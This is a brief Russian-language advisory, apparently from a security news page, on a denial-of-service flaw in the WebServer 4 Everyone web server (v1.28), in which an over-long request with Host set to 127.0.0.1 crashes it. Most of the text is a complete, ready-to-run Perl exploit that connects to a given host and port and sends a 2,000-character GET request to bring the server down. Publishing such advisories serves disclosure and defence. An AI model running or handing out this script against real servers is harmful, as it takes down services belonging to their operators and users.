WebServer 4 Everyone — небольшой Web-Сервер. Если
атакующий пошлет запрос более 2.000 символов
с полем Host равным 127.0.0.1, то сервер упадет.

Эксплоит:

#!/usr/bin/perl -w

use IO::Socket;

$host = $ARGV[0];
$port = $ARGV[1];
$evil = "A" x 2000;

print "Web Server 4 Everyone v1.28 Host Field Denial of Service
Vulnerability by SecurityOffice\n";
print "Usage: $0 host port\n";
print "Connecting…\n";
$socket = IO::Socket::INET->
new(Proto=>"tcp",
PeerAddr=>$host,
PeerPort=>$port)
|| die "Connection failed.\n";

print "Attacking…\n";
print $socket "GET /$evil HTTP/1.1\n Host: 127.0.0.1\n\n";

close($socket);
print "\nConnection closed. Finished.\n\n";



Оставить мнение